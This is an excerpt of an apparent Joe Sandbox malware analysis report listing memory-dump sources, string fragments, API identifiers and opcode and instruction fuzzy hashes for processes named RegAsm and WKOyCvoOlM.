                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: __aulldvrm
                                                                                          • String ID: +$-
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H$!$$$%$)G$*$,$-=$3M$;$>w$C$D$V$W$cm$c{$d$fh$g_$j$r3$r}$sE${2$}$*
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$O$S$\$s
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ^gp
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Vz
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: n
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: }
                                                                                          • Opcode Fuzzy Hash: d0ba67e25e7382c6959824169f2517bbeef0a9b849f27541f10cbfeab08c2f47
                                                                                          • Instruction Fuzzy Hash: 4A31D4B5A00609AFDB14DF98D881EDEB7B9FF8C310F108619FD19A7340D730A9018BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37450ed9320ed747583e76d7116aa8136903bf487740203701d810e32cbb4698
                                                                                          • Instruction ID: 29f7abf1e6633bc73707deb409648552e007e4c6dee4d159c799ccc1636a6a04
                                                                                          • Opcode Fuzzy Hash: 37450ed9320ed747583e76d7116aa8136903bf487740203701d810e32cbb4698
                                                                                          • Instruction Fuzzy Hash: B731C7B5A00609AFDB14DF98D881EEEB7B9FF8C310F108659FD19A7350D730A9118BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 12df1f34ff6068796d62d5657343c1cf71f97c741f8d7bb9722ee6a4f890f02b
                                                                                          • Instruction ID: b37612e7c609df07794dfd745603d0d354d97ef82160d6237c23012b55a2e08c
                                                                                          • Opcode Fuzzy Hash: 12df1f34ff6068796d62d5657343c1cf71f97c741f8d7bb9722ee6a4f890f02b
                                                                                          • Instruction Fuzzy Hash: F031D875A00609ABDB14EF59DC81EDF77B9EF88300F108549F919A7250D730A9118BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6026ceda241b38e3d4950ec4aeb836ab5f1684dc733889314fd511cf75e31ef6
                                                                                          • Instruction ID: 79026ae10a85f3b09d77e4a818aea54d13e4c962c5b3ccba530f0a3b803027a4
                                                                                          • Opcode Fuzzy Hash: 6026ceda241b38e3d4950ec4aeb836ab5f1684dc733889314fd511cf75e31ef6
                                                                                          • Instruction Fuzzy Hash: D02107B5A00609AFDB14EF98DC85EAF77B8FF88300F008549FD19A7240D770A9128BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f50ed88d6371a4a314fe082c5f71a0f6004bf9c2f709cd01a49007d96049a34
                                                                                          • Instruction ID: c41b365335bddbeae6883f3c75353389b4db2df44230c35320145fcf6d9b919b
                                                                                          • Opcode Fuzzy Hash: 2f50ed88d6371a4a314fe082c5f71a0f6004bf9c2f709cd01a49007d96049a34
                                                                                          • Instruction Fuzzy Hash: F71170B67807457AF720EE55AC82FAB776CABC5F10F244015FB08BE2C1D6A4B81146B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6e00ae32ac056cc0f8cb78f7ffa69379f4c48db53c9c90554240c11dcf1390c
                                                                                          • Instruction ID: aa635c1ea8b741d6c298b877c8c5fa8316e13eb7c1e4cb84e0d4db7f585228be
                                                                                          • Opcode Fuzzy Hash: f6e00ae32ac056cc0f8cb78f7ffa69379f4c48db53c9c90554240c11dcf1390c
                                                                                          • Instruction Fuzzy Hash: 2B114C75600705AFE714EB54DC85FAF77BCEFC5310F404549FA196B290E7706A128BA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8dcca712f7d34bb578128adfd0739e9008b4fd27078ab797ad81507f663a4dfe
                                                                                          • Instruction ID: a5b67e93686e29d107d90fef5dd1f8871f463009ddb659805295eb0dc58e31df
                                                                                          • Opcode Fuzzy Hash: 8dcca712f7d34bb578128adfd0739e9008b4fd27078ab797ad81507f663a4dfe
                                                                                          • Instruction Fuzzy Hash: CA115E75A00755ABE714EB58DC85FEF77BCEFC5310F004949FA196B280D7706A058BA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f158dff495f0ca1b3ad0be2cd973265b94fc99d78ccc8444f14fd52262d7041c
                                                                                          • Instruction ID: aaa7a8771e475f038695cbcfbf330b538865055d60a6284cdcd947be38911f4e
                                                                                          • Opcode Fuzzy Hash: f158dff495f0ca1b3ad0be2cd973265b94fc99d78ccc8444f14fd52262d7041c
                                                                                          • Instruction Fuzzy Hash: A411FEB6D0121DAFCB00DFE9D9419EEBBF9FF88210F54416AE919E7204E7705A05CBA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b5811ed46101696acd661fa091d3c241307178cb701c82dc741a64343b1bffc9
                                                                                          • Instruction ID: 0209b7cb9b0ebd247f784e6a933ff8511d75425f358c58527da04de70d4592c8
                                                                                          • Opcode Fuzzy Hash: b5811ed46101696acd661fa091d3c241307178cb701c82dc741a64343b1bffc9
                                                                                          • Instruction Fuzzy Hash: FA0184BAA002156BD710FB64EC49DFB737CEF84210F000295FD18AB255FA60AA514AE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1f9de2d277663f248dc475acfb00cfcf02e6efb23f6520d41dceba9b59ac42f
                                                                                          • Instruction ID: 0376c9f4bcbb9eb6ff32ae2b0ccca14302cd7c94318ae567842d4fece01f6041
                                                                                          • Opcode Fuzzy Hash: f1f9de2d277663f248dc475acfb00cfcf02e6efb23f6520d41dceba9b59ac42f
                                                                                          • Instruction Fuzzy Hash: AD111FB1C142299FCF10DFBDA8441EDBFF4FA09621B24865BE418E7250D37186418F94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1078cefb9aaa29c0b5bad75ec64d2bd3bbd7b21b199b39d9232704d7552c12f7
                                                                                          • Instruction ID: e6eb70ed93f6ba4237ed5dfad1ea0648250ae798da1867f139241dced9e7798b
                                                                                          • Opcode Fuzzy Hash: 1078cefb9aaa29c0b5bad75ec64d2bd3bbd7b21b199b39d9232704d7552c12f7
                                                                                          • Instruction Fuzzy Hash: A601A2B2200509BFDB14DE89DC81EDB77ADAB8C710F404608BA09E7240D630E8518BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 727d3a0093ba4321d8851b568f704b62edd3b0433aedbe9f9b1c153f4653126b
                                                                                          • Instruction ID: 51743a00ede79f686815851e377f1414d9c23e61d8145937ad78a7cd4d406b40
                                                                                          • Opcode Fuzzy Hash: 727d3a0093ba4321d8851b568f704b62edd3b0433aedbe9f9b1c153f4653126b
                                                                                          • Instruction Fuzzy Hash: 630121B6C01219AFCB40DFE8D8409EEFBF9BB08200F14426EE815F7210F77056048BA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79bcb27519c128d4e76375048e9753d6dc2c823dbf14a78046b66cd312848e2c
                                                                                          • Instruction ID: 479ea9c6a731c69b89af07fab3888f7befa5ee74f5168a0ce76e60938d014691
                                                                                          • Opcode Fuzzy Hash: 79bcb27519c128d4e76375048e9753d6dc2c823dbf14a78046b66cd312848e2c
                                                                                          • Instruction Fuzzy Hash: 05F027B36042076BD710EA5DFC80B96F7ACFB84234F240632F91DCB251E672E41186E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90e61b65a2183d8b70b3c3e69f85a407500c9fc6efab18df22950531de081f07
                                                                                          • Instruction ID: 252e3e6f332ec6e75acd14b1523caa92c287b328928b413272dfaaee46e53906
                                                                                          • Opcode Fuzzy Hash: 90e61b65a2183d8b70b3c3e69f85a407500c9fc6efab18df22950531de081f07
                                                                                          • Instruction Fuzzy Hash: C6F05876200209BBD700EF88DC81EAB73ACEFC8610F004419FA19A7241C670B9118BB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction ID: 130fab30a48591709a534977bc62b688b77b4ce0c9855190d83b1861223f5975
                                                                                          • Opcode Fuzzy Hash: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction Fuzzy Hash: D7E06D76200704BFD614EF98EC45E9B33ACEFC8710F404419F919AB242D630B9108AB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                          • Instruction ID: fe26017fe543ae9e535428298446b6a1967bed28349a60195743db7186606b7f
                                                                                          • Opcode Fuzzy Hash: 42030f2fe2bf68779df69c477925f43a6da38f8270e0870f8dcb97eb83245dcf
                                                                                          • Instruction Fuzzy Hash: 31F08271C05209EBDB14DFA4E881BDDBBB8EB04320F2087A9E8299B280E63497558781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_3490000_WKOyCvoOlM.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5da9e39a43b1e0a2ccfa1c1bce6c99ba25833764013f033c0867ff9f570509aa
                                                                                          • Instruction ID: 16c3108ce23adc82f55746073f86c96a1186cd58198f4fb7e7fb67f06e73619a
                                                                                          • Opcode Fuzzy Hash: 5da9e39a43b1e0a2ccfa1c1bce6c99ba25833764013f033c0867ff9f570509aa
                                                                                          • Instruction Fuzzy Hash: D4E04F36B4125437D620A689AC05FABB7ACDBC5A60F190064FE0DBB365E674A90142E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3404733244.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                          Strings
                                                                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                          • API String ID: 0-392141074
                                                                                          Strings
                                                                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                          • API String ID: 0-2877786613